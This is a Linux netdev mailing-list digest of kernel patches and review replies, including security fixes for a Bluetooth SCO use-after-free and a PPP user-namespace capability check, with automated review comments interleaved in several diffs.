Netdev List
* [PATCH RESEND net-next 2/2] KEYS: annotate struct user_key_payload with __counted_by
From: Thorsten Blum @ 2026-04-09  7:37 UTC
  To: David Howells, Jarkko Sakkinen, Kees Cook, Gustavo A. R. Silva
  Cc: Thorsten Blum, netdev, keyrings, linux-kernel, linux-hardening
In-Reply-To: <20260409073711.57020-4-thorsten.blum@linux.dev>

Add the __counted_by() compiler attribute to the flexible array member
'data' to improve access bounds-checking via CONFIG_UBSAN_BOUNDS and
CONFIG_FORTIFY_SOURCE.

Signed-off-by: Thorsten Blum <thorsten.blum@linux.dev>
---
Resending this because patch 2/2 didn't go to netdev@ (Jakub)
Cc: netdev@vger.kernel.org
---
 include/keys/user-type.h | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/include/keys/user-type.h b/include/keys/user-type.h
index 386c31432789..2305991f4fcd 100644
--- a/include/keys/user-type.h
+++ b/include/keys/user-type.h
@@ -27,7 +27,8 @@
 struct user_key_payload {
 	struct rcu_head	rcu;		/* RCU destructor */
 	unsigned short	datalen;	/* length of this data */
-	char		data[] __aligned(__alignof__(u64)); /* actual data */
+	char		data[]		/* actual data */
+			__aligned(__alignof__(u64)) __counted_by(datalen);
 };
 
 extern struct key_type key_type_user;
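
Review bot: The `__counted_by(datalen)` annotation on `data[]` makes `datalen` the authoritative bound, so every site that allocates a `struct user_key_payload` has to assign `datalen` before its first write to `data`, and any access at index `datalen` (such as a trailing NUL) becomes a bounds violation under CONFIG_UBSAN_BOUNDS. The commit message should say that the allocation sites were audited for this ordering and that the change depends on patch 1/2 dropping the `data[result_len]` store.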


* [PATCH RESEND net-next 1/2] keys, dns: drop unused upayload->data NUL terminator
From: Thorsten Blum @ 2026-04-09  7:37 UTC
  To: David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
	Simon Horman, Tim Bird, Thorsten Blum
  Cc: netdev, linux-kernel

In dns_resolver_preparse(), do not NUL-terminate ->data and allocate one
byte less. The NUL terminator is never used and only ->datalen bytes are
accessed.

Signed-off-by: Thorsten Blum <thorsten.blum@linux.dev>
---
Resending this because patch 2/2 didn't go to netdev@ (Jakub)
Cc: netdev@vger.kernel.org
---
 net/dns_resolver/dns_key.c | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/net/dns_resolver/dns_key.c b/net/dns_resolver/dns_key.c
index c3c8c3240ef9..451247864a63 100644
--- a/net/dns_resolver/dns_key.c
+++ b/net/dns_resolver/dns_key.c
@@ -203,7 +203,7 @@ dns_resolver_preparse(struct key_preparsed_payload *prep)
 	kdebug("store result");
 	prep->quotalen = result_len;
 
-	upayload = kmalloc_flex(*upayload, data, result_len + 1);
+	upayload = kmalloc_flex(*upayload, data, result_len);
 	if (!upayload) {
 		kleave(" = -ENOMEM");
 		return -ENOMEM;
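
Review bot: Shrinking the `kmalloc_flex()` count to `result_len` is only correct together with the removal of the `upayload->data[result_len]` store in the next hunk, so the two changes must not be split or partially backported. If the motivation is the `__counted_by(datalen)` annotation in patch 2/2, the commit message should say so, since it otherwise reads as saving a single byte.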
@@ -211,7 +211,6 @@ dns_resolver_preparse(struct key_preparsed_payload *prep)
 
 	upayload->datalen = result_len;
 	memcpy(upayload->data, data, result_len);
-	upayload->data[result_len] = '\0';
 
 	prep->payload.data[dns_key_data] = upayload;
 	kleave(" = 0");
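
Review bot: Removing `upayload->data[result_len] = '\0'` is safe only if no reader treats `->data` as a C string; the changelog asserts that only `->datalen` bytes are accessed but does not name the readers that were checked. Listing them in the commit message would let reviewers confirm that none passes `data` to a `%s` format or a `str*()` helper.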


* Re: [PATCH net v2] net_sched: fix skb memory leak in deferred qdisc drops
From: Eric Dumazet @ 2026-04-09  7:37 UTC
  To: Fernando Fernandez Mancera
  Cc: netdev, horms, pabeni, kuba, davem, Damilola Bello
In-Reply-To: <20260408100044.4530-1-fmancera@suse.de>

On Wed, Apr 8, 2026 at 3:01 AM Fernando Fernandez Mancera
<fmancera@suse.de> wrote:
>
> When the network stack cleans up the deferred list via qdisc_run_end(),
> it operates on the root qdisc. If the root qdisc does not implement the
> TCQ_F_DEQUEUE_DROPS flag, the packets queued to free are never freed and
> get stranded on the child's local to_free list.
>
> Fix this by making qdisc_dequeue_drop() aware of the root qdisc. It
> fetches the root qdisc and checks for the TCQ_F_DEQUEUE_DROPS flag. If
> the flag is present, the packet is appended directly to the root's
> to_free list. Otherwise, drop it directly as it was done before the
> optimization was implemented.
>
> Fixes: a6efc273ab82 ("net_sched: use qdisc_dequeue_drop() in cake, codel, fq_codel")
> Reported-by: Damilola Bello <damilola@aterlo.com>
> Closes: https://lore.kernel.org/netdev/CAPgFtOLaedBMU0f_BxV2bXftTJSmJr018Q5uozOo5vVo6b9tjw@mail.gmail.com/
> Signed-off-by: Fernando Fernandez Mancera <fmancera@suse.de>
> ---

Reviewed-by: Eric Dumazet <edumazet@google.com>

Thanks !


* Re: [PATCH net-next v9 00/10] net: phy_port: SFP modules representation and phy_port listing
From: Paolo Abeni @ 2026-04-09  7:35 UTC
  To: Maxime Chevallier, davem, Andrew Lunn, Jakub Kicinski,
	Eric Dumazet, Russell King, Heiner Kallweit
  Cc: netdev, linux-kernel, thomas.petazzoni, Christophe Leroy,
	Herve Codina, Florian Fainelli, Vladimir Oltean,
	Köry Maincent, Marek Behún, Oleksij Rempel,
	Nicolò Veronese, Simon Horman, mwojtas, Romain Gantois,
	Daniel Golle, Dimitri Fedrau
In-Reply-To: <20260403123755.175742-1-maxime.chevallier@bootlin.com>

On 4/3/26 2:37 PM, Maxime Chevallier wrote:
> Hello everyone,
> 
> Here's V9 for the phy_port netlink interface (get-only for now).
> 
> V9 addresses sashiko's issues (not all of them, as some don't make
> sense), and updates the missing parts in the doc.
> 
> This work extends on the recent addition of phy_port representation to enable
> listing the front-facing ports of an interface. For now, we don't control
> these ports, we merely list their presence and their capabilities.
> 
> As the most common use-case of multi-port interfaces is combo-ports that
> provide both RJ45 and SFP connectors on a single MAC, there's a lot of
> SFP stuff in this series.
> 
> This series is in 2 main parts. The first one aims at representing the
> SFP cages and modules using phy_port, as combo-ports with RJ45 + SFP are
> by far the most common cases for multi-connector setups.
> 
> The second part is the netlink interface to list those ports, now that
> most use-cases are covered.
> 
> Let's see what we can do with some examples of the new ethtool API :
> 
> - Get MII interfaces supported by an empty SFP cage :
> 
> # ethtool --show-ports eth3
> 
> Port for eth3:
> 	Port id: 1
> 	Vacant: yes
> 	Supported MII interfaces : sgmii, 1000base-x, 2500base-x
> 	Port type: sfp
> 
> - Get Combo-ports supported modes, on each port :
> 
> # ethtool --show-ports eth1
> 
> Port for eth1:
> 	Port id: 1
> 	Vacant: no
> 	Supported link modes:  10baseT/Half 10baseT/Full
> 	                       100baseT/Half 100baseT/Full
> 	                       1000baseT/Full
> 	                       10000baseT/Full
> 	                       2500baseT/Full
> 	                       5000baseT/Full
> 
> 	Port type: mdi
> 
> Port for eth1:
> 	Port id: 2
> 	Vacant: yes
> 	Supported MII interfaces : 10gbase-r
> 	Port type: sfp
> 
> - Get Achievable linkmodes on a SFP module (combo port with a DAC in the
> SFP cage)
> 
> # ethtool --show-ports eth1
> 
> Port for eth1:
> 	Port id: 1
> 	Vacant: no
> 	Supported link modes:  10baseT/Half 10baseT/Full
> 	                       100baseT/Half 100baseT/Full
> 	                       1000baseT/Full
> 	                       10000baseT/Full
> 	                       2500baseT/Full
> 	                       5000baseT/Full
> 	Port type: mdi
> 
> Port for eth1:
> 	Port id: 2
> 	Vacant: no
> 	Supported MII interfaces : 10gbase-r
> 	Port type: sfp
> 
> Port for eth1:
> 	Port id: 3
> 	Vacant: no
> 	Supported link modes:  10000baseCR/Full
> 	Port type: mdi
> 
> Note that here, we have 3 ports :
>  - The Copper port
>  - The SFP Cage itself, marked as 'occupied'
>  - The SFP module
> 
> This series builds on top of phy_port and phy_link_topology to allow
> tracking the ports of an interface. We maintain a list of supported
> linkmodes/interfaces on each port, which allows for fine-grained
> reporting of each port's capability.
> 
> What this series doesn't do :
>  - We don't support selecting which port is active. This is the next step.
>  - We only support PHY-driven combo ports. The end-goal of this whole
>    journey that started with phy_link_topology is to get support for MII
>    muxes, such as the one we have on the Turris Omnia. This will eventually
>    be upstreamed as well.
> 
> If you want to play around with it, here's [1] the patched ethtool that I've
> been using to produce the outputs above.
> 
> Thanks !
> 
> Maxime
> 
> [1] : https://github.com/minimaxwell/ethtool/tree/mc/ethtool_port

Some feedback from Andrew, Russell or Heiner would be very appreciated.

@Maxime: I went over sashiko feedback and I *think* it ranges from
orthogonal to wrong, but it would be useful if you could go over it.

Thanks,

Paolo



* Re: [RFC net-next 2/4] selftests: drv-net: tso: add helpers for double tunneling GSO
From: Xu Du @ 2026-04-09  7:35 UTC
  To: Jakub Kicinski
  Cc: davem, edumazet, pabeni, horms, shuah, netdev, linux-kselftest,
	linux-kernel
In-Reply-To: <20260408172741.39e65ab3@kernel.org>

On Thu, Apr 9, 2026 at 8:27 AM Jakub Kicinski <kuba@kernel.org> wrote:
>
> On Wed, 8 Apr 2026 10:04:09 +0800 Xu Du wrote:
> > On Tue, Apr 7, 2026 at 11:08 PM Jakub Kicinski <kuba@kernel.org> wrote:
> > >
> > > On Tue,  7 Apr 2026 10:45:09 +0800 Xu Du wrote:
> > > > As the YNL Python module cannot be invoked across different devices or
> > > > environments directly in its current form, the helper abstracts the
> > > > YNL CLI calls to ensure proper configuration of the tunneling device
> > > > features.
> > >
> > > Can you explain more? Why can't you use class RtnlFamily?
> >
> > I want to test the gro-hint parameter functionality of the GENEVE tunnel,
> > so I intend to use YNL for the testing. I am conducting the test between
> > two machines using SSH type. I want to add the gro-hint parameter on
> > both the local and remote nodes; however, I am unable to invoke class
> > RtnlFamily on the remote node via SSH.
>
> Oh. But that's not really what you're doing:
>
> +def ynlcli(family, args, json=None, ns=None, host=None):
> +    if (KSFT_DIR / "kselftest-list.txt").exists():
> +        cli = KSFT_DIR / "net/lib/ynl/pyynl/cli.py"
> +        spec = KSFT_DIR / f"net/lib/specs/{family}.yaml"
> +    else:
> +        cli = KSRC / "tools/net/ynl/pyynl/cli.py"
> +        spec = KSRC / f"Documentation/netlink/specs/{family}.yaml"
> +    if not cli.exists():
> +        raise FileNotFoundError(f"cli not found at {cli}")
> +    args = f"--spec {spec} --no-schema {args}"
> +    return tool(cli.as_posix(), args, json=json, ns=ns, host=host, shell=True)
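
Review bot: In the `args = f"--spec {spec} --no-schema {args}"` line, the spec path is interpolated unquoted into a string that is then run with `shell=True`, so a source or install path containing spaces or shell metacharacters changes the command executed on `host`. Quote the path (for example with `shlex.quote()`) before building the command string.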
>
> You're not deploying anything to the remote system.
> Are you assuming that the remote system magically has the same
> filesystem layout?
>
> You can use the ynl CLI but it has to be whatever version is on
> the remote system. Just call ynl --family rt-link, don't dig
> around for the spec paths etc.
>

In fact, I have tested this from two different locations. The first is in
tools/testing/selftests/drivers/net/hw/ using python3 tso.py,
which utilizes the specs located in Documentation/netlink/specs/.
The second follows the testing methodology described in the
README.rst of tools/testing/selftests/drivers/net/, which uses the specs
in net/lib/specs/. Based on this, I conclude that different processes utilize
different spec locations.
I also referred to the implementation in net/lib/py/ynl.py, which employs
a similar handling logic. Both using the source code repository and
installing the package can meet the requirements for remote testing.

-- 

Regards,

Xu



* [PATCH 5.15.y] Bluetooth: SCO: Fix use-after-free in sco_recv_frame() due to missing sock_hold
From: Jianqiang kang @ 2026-04-09  7:26 UTC
  To: gregkh, stable, imv4bel
  Cc: patches, linux-kernel, marcel, johan.hedberg, luiz.dentz, davem,
	kuba, linux-bluetooth, netdev, luiz.von.dentz

From: Hyunwoo Kim <imv4bel@gmail.com>

[ Upstream commit 598dbba9919c5e36c54fe1709b557d64120cb94b ]

sco_recv_frame() reads conn->sk under sco_conn_lock() but immediately
releases the lock without holding a reference to the socket. A concurrent
close() can free the socket between the lock release and the subsequent
sk->sk_state access, resulting in a use-after-free.

Other functions in the same file (sco_sock_timeout(), sco_conn_del())
correctly use sco_sock_hold() to safely hold a reference under the lock.

Fix by using sco_sock_hold() to take a reference before releasing the
lock, and adding sock_put() on all exit paths.

Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2")
Signed-off-by: Hyunwoo Kim <imv4bel@gmail.com>
Signed-off-by: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
Signed-off-by: Jianqiang kang <jianqkang@sina.cn>
---
 net/bluetooth/sco.c | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
index d98648bcc1a8..d0ef74c45914 100644
--- a/net/bluetooth/sco.c
+++ b/net/bluetooth/sco.c
@@ -311,7 +311,7 @@ static void sco_recv_frame(struct sco_conn *conn, struct sk_buff *skb)
 	struct sock *sk;
 
 	sco_conn_lock(conn);
-	sk = conn->sk;
+	sk = sco_sock_hold(conn);
 	sco_conn_unlock(conn);
 
 	if (!sk)
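
Review bot: This 5.15.y backport depends on `sco_sock_hold()` being present in the stable tree and returning NULL when `conn->sk` is unset, because the unchanged `if (!sk)` test after the unlock is the only guard before `sk` is used. The commit message only cites the other callers of the helper; a short backport note confirming that 5.15.y carries the same helper with the same NULL behaviour would make that explicit.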
@@ -320,11 +320,15 @@ static void sco_recv_frame(struct sco_conn *conn, struct sk_buff *skb)
 	BT_DBG("sk %p len %u", sk, skb->len);
 
 	if (sk->sk_state != BT_CONNECTED)
-		goto drop;
+		goto drop_put;
 
-	if (!sock_queue_rcv_skb(sk, skb))
+	if (!sock_queue_rcv_skb(sk, skb)) {
+		sock_put(sk);
 		return;
+	}
 
+drop_put:
+	sock_put(sk);
 drop:
 	kfree_skb(skb);
 }
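
Review bot: `drop_put:` falls through into `drop:`, and `drop:` stays reachable for the path that holds no reference, so the correctness of the exit paths depends on which label each `goto` picks. A one-line comment at `drop_put:` stating that it may only be reached with a held reference would protect this from being mis-merged in later backports. In the success branch, `sock_put(sk)` after `sock_queue_rcv_skb()` is in the right order.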
-- 
2.34.1



* Re: [PATCH v2 1/2] drm/drm_ras: Add clear-error-counter netlink command to drm_ras
From: Tauro, Riana @ 2026-04-09  7:21 UTC
  To: intel-xe, dri-devel, netdev, rodrigo.vivi, Zack McKevitt,
	joonas.lahtinen, aravind.iddamsetty
  Cc: anshuman.gupta, simona.vetter, airlied, pratik.bari,
	joshua.santosh.ranjan, ashwin.kumar.kulkarni, shubham.kumar,
	ravi.kishore.koppuravuri, raag.jadav, anvesh.bakwad,
	maarten.lankhorst, Jakub Kicinski, Lijo Lazar, Hawking Zhang,
	David S. Miller, Paolo Abeni, Eric Dumazet
In-Reply-To: <20260409073318.2909379-5-riana.tauro@intel.com>

Hi Zack,

Could you please take a look at this patch, if applicable to your
use case? Please let me know if any changes are required.

@Rodrigo: This is already reviewed by Jakub and Raag.
If there are no opens, can this be merged via drm_misc?

Thanks
Riana

On 4/9/2026 1:03 PM, Riana Tauro wrote:
> Introduce a new 'clear-error-counter' drm_ras command to reset the counter
> value for a specific error counter of a given node.
>
> The command is a 'do' netlink request with 'node-id' and 'error-id'
> as parameters with no response payload.
>
> Usage:
>
> $ sudo ynl --family drm_ras  --do clear-error-counter --json \
> '{"node-id":1, "error-id":1}'
> None
>
> Cc: Jakub Kicinski <kuba@kernel.org>
> Cc: Zack McKevitt <zachary.mckevitt@oss.qualcomm.com>
> Cc: Lijo Lazar <lijo.lazar@amd.com>
> Cc: Hawking Zhang <Hawking.Zhang@amd.com>
> Cc: David S. Miller <davem@davemloft.net>
> Cc: Paolo Abeni <pabeni@redhat.com>
> Cc: Eric Dumazet <edumazet@google.com>
> Signed-off-by: Riana Tauro <riana.tauro@intel.com>
> Reviewed-by: Jakub Kicinski <kuba@kernel.org>
> Reviewed-by: Raag Jadav <raag.jadav@intel.com>
> ---
>   Documentation/gpu/drm-ras.rst            |  8 +++++
>   Documentation/netlink/specs/drm_ras.yaml | 13 ++++++-
>   drivers/gpu/drm/drm_ras.c                | 43 +++++++++++++++++++++++-
>   drivers/gpu/drm/drm_ras_nl.c             | 13 +++++++
>   drivers/gpu/drm/drm_ras_nl.h             |  2 ++
>   include/drm/drm_ras.h                    | 11 ++++++
>   include/uapi/drm/drm_ras.h               |  1 +
>   7 files changed, 89 insertions(+), 2 deletions(-)
>
> diff --git a/Documentation/gpu/drm-ras.rst b/Documentation/gpu/drm-ras.rst
> index 70b246a78fc8..4636e68f5678 100644
> --- a/Documentation/gpu/drm-ras.rst
> +++ b/Documentation/gpu/drm-ras.rst
> @@ -52,6 +52,8 @@ User space tools can:
>     as a parameter.
>   * Query specific error counter values with the ``get-error-counter`` command, using both
>     ``node-id`` and ``error-id`` as parameters.
> +* Clear specific error counters with the ``clear-error-counter`` command, using both
> +  ``node-id`` and ``error-id`` as parameters.
>   
>   YAML-based Interface
>   --------------------
> @@ -101,3 +103,9 @@ Example: Query an error counter for a given node
>       sudo ynl --family drm_ras --do get-error-counter --json '{"node-id":0, "error-id":1}'
>       {'error-id': 1, 'error-name': 'error_name1', 'error-value': 0}
>   
> +Example: Clear an error counter for a given node
> +
> +.. code-block:: bash
> +
> +    sudo ynl --family drm_ras --do clear-error-counter --json '{"node-id":0, "error-id":1}'
> +    None
> diff --git a/Documentation/netlink/specs/drm_ras.yaml b/Documentation/netlink/specs/drm_ras.yaml
> index 79af25dac3c5..e113056f8c01 100644
> --- a/Documentation/netlink/specs/drm_ras.yaml
> +++ b/Documentation/netlink/specs/drm_ras.yaml
> @@ -99,7 +99,7 @@ operations:
>         flags: [admin-perm]
>         do:
>           request:
> -          attributes:
> +          attributes: &id-attrs
>               - node-id
>               - error-id
>           reply:
> @@ -113,3 +113,14 @@ operations:
>               - node-id
>           reply:
>             attributes: *errorinfo
> +    -
> +      name: clear-error-counter
> +      doc: >-
> +           Clear error counter for a given node.
> +           The request includes the error-id and node-id of the
> +           counter to be cleared.
> +      attribute-set: error-counter-attrs
> +      flags: [admin-perm]
> +      do:
> +        request:
> +          attributes: *id-attrs
> diff --git a/drivers/gpu/drm/drm_ras.c b/drivers/gpu/drm/drm_ras.c
> index b2fa5ab86d87..d6eab29a1394 100644
> --- a/drivers/gpu/drm/drm_ras.c
> +++ b/drivers/gpu/drm/drm_ras.c
> @@ -26,7 +26,7 @@
>    * efficient lookup by ID. Nodes can be registered or unregistered
>    * dynamically at runtime.
>    *
> - * A Generic Netlink family `drm_ras` exposes two main operations to
> + * A Generic Netlink family `drm_ras` exposes the below operations to
>    * userspace:
>    *
>    * 1. LIST_NODES: Dump all currently registered RAS nodes.
> @@ -37,6 +37,10 @@
>    *    Returns all counters of a node if only Node ID is provided or specific
>    *    error counters.
>    *
> + * 3. CLEAR_ERROR_COUNTER: Clear error counter of a given node.
> + *    Userspace must provide Node ID, Error ID.
> + *    Clears specific error counter of a node if supported.
> + *
>    * Node registration:
>    *
>    * - drm_ras_node_register(): Registers a new node and assigns
> @@ -66,6 +70,8 @@
>    *   operation, fetching all counters from a specific node.
>    * - drm_ras_nl_get_error_counter_doit(): Implements the GET_ERROR_COUNTER doit
>    *   operation, fetching a counter value from a specific node.
> + * - drm_ras_nl_clear_error_counter_doit(): Implements the CLEAR_ERROR_COUNTER doit
> + *   operation, clearing a counter value from a specific node.
>    */
>   
>   static DEFINE_XARRAY_ALLOC(drm_ras_xa);
> @@ -314,6 +320,41 @@ int drm_ras_nl_get_error_counter_doit(struct sk_buff *skb,
>   	return doit_reply_value(info, node_id, error_id);
>   }
>   
> +/**
> + * drm_ras_nl_clear_error_counter_doit() - Clear an error counter of a node
> + * @skb: Netlink message buffer
> + * @info: Generic Netlink info containing attributes of the request
> + *
> + * Extracts the node ID and error ID from the netlink attributes and
> + * clears the current value.
> + *
> + * Return: 0 on success, or negative errno on failure.
> + */
> +int drm_ras_nl_clear_error_counter_doit(struct sk_buff *skb,
> +					struct genl_info *info)
> +{
> +	struct drm_ras_node *node;
> +	u32 node_id, error_id;
> +
> +	if (!info->attrs ||
> +	    GENL_REQ_ATTR_CHECK(info, DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID) ||
> +	    GENL_REQ_ATTR_CHECK(info, DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID))
> +		return -EINVAL;
> +
> +	node_id = nla_get_u32(info->attrs[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID]);
> +	error_id = nla_get_u32(info->attrs[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID]);
> +
> +	node = xa_load(&drm_ras_xa, node_id);
> +	if (!node || !node->clear_error_counter)
> +		return -ENOENT;
> +
> +	if (error_id < node->error_counter_range.first ||
> +	    error_id > node->error_counter_range.last)
> +		return -EINVAL;
> +
> +	return node->clear_error_counter(node, error_id);
> +}
> +
>   /**
>    * drm_ras_node_register() - Register a new RAS node
>    * @node: Node structure to register
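
Review bot: In `drm_ras_nl_clear_error_counter_doit()`, `node` comes from `xa_load(&drm_ras_xa, node_id)` and is then dereferenced and called through `node->clear_error_counter()` with no lock or reference visible in this hunk, while the file header says nodes can be unregistered dynamically at runtime. Please document, or add, what keeps `node` valid until the callback returns. Separately, returning -ENOENT for both a missing node and a missing callback hides the "unsupported" case from user space; -EOPNOTSUPP for `!node->clear_error_counter` would distinguish the two.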
> diff --git a/drivers/gpu/drm/drm_ras_nl.c b/drivers/gpu/drm/drm_ras_nl.c
> index 16803d0c4a44..dea1c1b2494e 100644
> --- a/drivers/gpu/drm/drm_ras_nl.c
> +++ b/drivers/gpu/drm/drm_ras_nl.c
> @@ -22,6 +22,12 @@ static const struct nla_policy drm_ras_get_error_counter_dump_nl_policy[DRM_RAS_
>   	[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID] = { .type = NLA_U32, },
>   };
>   
> +/* DRM_RAS_CMD_CLEAR_ERROR_COUNTER - do */
> +static const struct nla_policy drm_ras_clear_error_counter_nl_policy[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID + 1] = {
> +	[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID] = { .type = NLA_U32, },
> +	[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID] = { .type = NLA_U32, },
> +};
> +
>   /* Ops table for drm_ras */
>   static const struct genl_split_ops drm_ras_nl_ops[] = {
>   	{
> @@ -43,6 +49,13 @@ static const struct genl_split_ops drm_ras_nl_ops[] = {
>   		.maxattr	= DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID,
>   		.flags		= GENL_ADMIN_PERM | GENL_CMD_CAP_DUMP,
>   	},
> +	{
> +		.cmd		= DRM_RAS_CMD_CLEAR_ERROR_COUNTER,
> +		.doit		= drm_ras_nl_clear_error_counter_doit,
> +		.policy		= drm_ras_clear_error_counter_nl_policy,
> +		.maxattr	= DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID,
> +		.flags		= GENL_ADMIN_PERM | GENL_CMD_CAP_DO,
> +	},
>   };
>   
>   struct genl_family drm_ras_nl_family __ro_after_init = {
> diff --git a/drivers/gpu/drm/drm_ras_nl.h b/drivers/gpu/drm/drm_ras_nl.h
> index 06ccd9342773..a398643572a5 100644
> --- a/drivers/gpu/drm/drm_ras_nl.h
> +++ b/drivers/gpu/drm/drm_ras_nl.h
> @@ -18,6 +18,8 @@ int drm_ras_nl_get_error_counter_doit(struct sk_buff *skb,
>   				      struct genl_info *info);
>   int drm_ras_nl_get_error_counter_dumpit(struct sk_buff *skb,
>   					struct netlink_callback *cb);
> +int drm_ras_nl_clear_error_counter_doit(struct sk_buff *skb,
> +					struct genl_info *info);
>   
>   extern struct genl_family drm_ras_nl_family;
>   
> diff --git a/include/drm/drm_ras.h b/include/drm/drm_ras.h
> index 5d50209e51db..f2a787bc4f64 100644
> --- a/include/drm/drm_ras.h
> +++ b/include/drm/drm_ras.h
> @@ -58,6 +58,17 @@ struct drm_ras_node {
>   	int (*query_error_counter)(struct drm_ras_node *node, u32 error_id,
>   				   const char **name, u32 *val);
>   
> +	/**
> +	 * @clear_error_counter:
> +	 *
> +	 * This callback is used by drm_ras to clear a specific error counter.
> +	 * Driver should implement this callback to support clearing error counters
> +	 * of a node.
> +	 *
> +	 * Returns: 0 on success, negative error code on failure.
> +	 */
> +	int (*clear_error_counter)(struct drm_ras_node *node, u32 error_id);
> +
>   	/** @priv: Driver private data */
>   	void *priv;
>   };
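
Review bot: The kernel-doc for `@clear_error_counter` does not say that `error_id` has already been checked against `error_counter_range` by the core, nor in which context the callback runs. Adding both would tell driver authors whether they must re-validate `error_id` and whether the callback may sleep.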
> diff --git a/include/uapi/drm/drm_ras.h b/include/uapi/drm/drm_ras.h
> index 5f40fa5b869d..218a3ee86805 100644
> --- a/include/uapi/drm/drm_ras.h
> +++ b/include/uapi/drm/drm_ras.h
> @@ -41,6 +41,7 @@ enum {
>   enum {
>   	DRM_RAS_CMD_LIST_NODES = 1,
>   	DRM_RAS_CMD_GET_ERROR_COUNTER,
> +	DRM_RAS_CMD_CLEAR_ERROR_COUNTER,
>   
>   	__DRM_RAS_CMD_MAX,
>   	DRM_RAS_CMD_MAX = (__DRM_RAS_CMD_MAX - 1)


* Re: [PATCH net] net: fix __this_cpu_add() in preemptible code in dev_xmit_recursion_inc/dec
From: Eric Dumazet @ 2026-04-09  7:18 UTC
  To: Jiayuan Chen
  Cc: netdev, David S. Miller, Jakub Kicinski, Paolo Abeni,
	Simon Horman, Andrew Lunn, Sebastian Andrzej Siewior,
	Clark Williams, Steven Rostedt, Weiming Shi, linux-kernel,
	linux-rt-devel
In-Reply-To: <20260409035344.214279-1-jiayuan.chen@linux.dev>

On Wed, Apr 8, 2026 at 8:54 PM Jiayuan Chen <jiayuan.chen@linux.dev> wrote:
>
> dev_xmit_recursion_inc/dec() use __this_cpu_inc/dec() which requires
> migration to be disabled. However, some callers like SCTP's UDP
> encapsulation path invoke iptunnel_xmit() from process context without
> disabling BH or preemption:
>
>   sctp_inet_connect -> __sctp_connect -> sctp_do_sm ->
>   sctp_outq_flush -> sctp_packet_transmit -> sctp_v4_xmit ->
>   udp_tunnel_xmit_skb -> iptunnel_xmit -> dev_xmit_recursion_inc
>
> This triggers the following warning on PREEMPT(full) kernels:
>
>
> Fix this by adding migrate_disable/enable() around the __this_cpu
> operations in dev_xmit_recursion_inc/dec() to ensure the per-cpu
> variable is accessed on the same CPU throughout the inc/dec pair.
>
> Fixes: 6f1a9140ecda ("net: add xmit recursion limit to tunnel xmit functions")
> Signed-off-by: Jiayuan Chen <jiayuan.chen@linux.dev>
> ---
>  include/linux/netdevice.h | 5 +++++
>  1 file changed, 5 insertions(+)
>
> diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
> index 7ca01eb3f7d2..6b1cd5380d70 100644
> --- a/include/linux/netdevice.h
> +++ b/include/linux/netdevice.h
> @@ -3591,14 +3591,19 @@ static inline bool dev_xmit_recursion(void)
>                         XMIT_RECURSION_LIMIT);
>  }
>
> +/* Non PREEMPT_RT version: inc and dec must run on the same CPU,
> + * migrate_disable is sufficient.
> + */
>  static inline void dev_xmit_recursion_inc(void)
>  {
> +       migrate_disable();
>         __this_cpu_inc(softnet_data.xmit.recursion);
>  }
>
>  static inline void dev_xmit_recursion_dec(void)
>  {
>         __this_cpu_dec(softnet_data.xmit.recursion);
> +       migrate_enable();
>  }
>  #else
>  static inline int dev_recursion_level(void)
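
Review bot: `migrate_disable()` in `dev_xmit_recursion_inc()` pins the task to a CPU but leaves preemption enabled, so another task scheduled on that CPU between the inc and the dec reads and modifies the same `softnet_data.xmit.recursion`, and the counter no longer measures the nesting depth of a single call chain. The pairing also keeps migration disabled across everything that runs between the two helpers; the added comment should state that and why it is acceptable.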
> --
> 2.43.0

This seems wrong.

The migrate_disable() should happen before dev_recursion_level().


* Re: [PATCH net v3] ppp: require CAP_NET_ADMIN in target netns for unattached ioctls
From: 하태구 @ 2026-04-09  7:18 UTC
  To: Andrew Lunn, David S. Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni, Qingfang Deng, Kees Cook, Taegu Ha,
	Kuniyuki Iwashima, Sebastian Andrzej Siewior, Cyrill Gorcunov,
	linux-ppp, netdev, linux-kernel
  Cc: qingfang.deng, gnault, jaco, richardbgobert, ericwouds,
	teknoraver
In-Reply-To: <20260409071117.4354-1-hataegu0826@gmail.com>

[-- Attachment #1: Type: text/plain, Size: 2749 bytes --]

Hello,

Yes, I have a QEMU-based PoC and validation log for the current patch.

The reproducer starts as an unprivileged uid, verifies that open("/dev/ppp")
fails before CLONE_NEWUSER, then creates only a new user namespace while
keeping the same network namespace, and finally attempts PPPIOCNEWUNIT.

With the current patch applied, the original userns-only inherited-netns path
is blocked as expected. In the same network namespace, open("/dev/ppp") still
succeeds after CLONE_NEWUSER, but PPPIOCNEWUNIT now fails with EPERM.

Relevant log lines from my current QEMU run:

    [*] initial netns ino=4026531833
    [*] dropped to uid=65534 gid=65534 before userns
    [*] open(/dev/ppp) before userns failed as expected: Operation not permitted
    [*] after userns-only unshare netns ino=4026531833
    [*] now uid=0 gid=65534 in new userns
    [*] open(/dev/ppp) after userns succeeded
    ioctl(PPPIOCNEWUNIT): Operation not permitted

I am attaching:
- the minimal guest reproducer used in QEMU
- the guest serial log from the current patched run

Thanks,
Taegu Ha
hataegu0826@gmail.com

On Thu, Apr 9, 2026 at 4:12 PM, Taegu Ha <hataegu0826@gmail.com> wrote:
>
> /dev/ppp open is currently authorized against file->f_cred->user_ns,
> while unattached administrative ioctls operate on current->nsproxy->net_ns.
>
> As a result, a local unprivileged user can create a new user namespace
> with CLONE_NEWUSER, gain CAP_NET_ADMIN only in that new user namespace,
> and still issue PPPIOCNEWUNIT, PPPIOCATTACH, or PPPIOCATTCHAN against
> an inherited network namespace.
>
> Require CAP_NET_ADMIN in the user namespace that owns the target network
